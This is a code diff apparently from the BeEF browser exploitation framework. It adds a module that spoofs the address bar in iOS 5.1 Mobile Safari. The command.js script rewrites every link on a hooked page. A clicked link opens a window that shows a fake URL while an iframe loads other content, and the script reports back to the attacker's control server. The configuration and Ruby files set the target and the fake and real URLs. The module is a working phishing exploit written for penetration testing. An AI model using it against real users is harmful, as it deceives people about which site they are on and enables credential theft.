Fixes Issue #650 - iOS Safari Address Bar Spoofing Command Module

modules/browser/mobilesafari_address_spoofing/command.js

@@ -0,0 +1,22 @@
+var somethingsomething = function() {
+	var fake_url = "<%= @fake_url %>";
+	var real_url = "<%= @real_url %>";
+
+	var newWindow = window.open(fake_url,'newWindow<%= @command_id %>','width=200,height=100,location=yes');
+	newWindow.document.write('<iframe style="width:100%;height:100%;border:0;padding:0;margin:0;" src="' + real_url + '"></iframe>');
+	newWindow.focus();
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Spoofed link clicked');	
+}
+
+beef.execute(function() {
+
+	$j('<%= @domselectah %>').each(function() {
+		$j(this).attr('href','#').click(function() {
+			somethingsomething();
+			return true;
+		});
+	});
+
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=All links rewritten');
+
+});

modules/browser/mobilesafari_address_spoofing/config.yaml

@@ -0,0 +1,30 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        mobilesafari_address_spoofing:
+            enable: true
+            category: ["Browser","Hooked Domain"]
+            name: "iOS Address Bar Spoofing"
+            description: "Mobile Safari iOS 5.1 Address Bar Spoofing. This is fixed in latest version of Mobile Safari (the URL turns 'blank')"
+            authors: ["bcoles","xntrik","majorsecurity.net"]
+            target:
+                working:
+                    S:
+                        os: ["iPhone"]
+                not_working:
+                    ALL:
+                        os: ["All"]

modules/browser/mobilesafari_address_spoofing/module.rb

@@ -0,0 +1,34 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Mobilesafari_address_spoofing < BeEF::Core::Command
+
+	def self.options
+		return [
+			{'name' => 'fake_url', 'ui_label' => 'Fake URL', 'type' => 'text', 'value' =>'http://en.wikipedia.org/wiki/Beef'},
+			{'name' => 'real_url', 'ui_label' => 'Real URL', 'type' => 'text', 'value' => 'http://www.beefproject.com'},
+			{'name' => 'domselectah', 'ui_label' => 'jQuery Selector for Link rewriting. \'a\' will overwrite all links', 'type' => 'text', 'value' => 'a'}
+		]
+	end
+
+	def post_execute
+		content = {}
+		content['results'] = @datastore['results']
+		content['query'] = @datastore['query']
+		save content
+	end
+
+end
+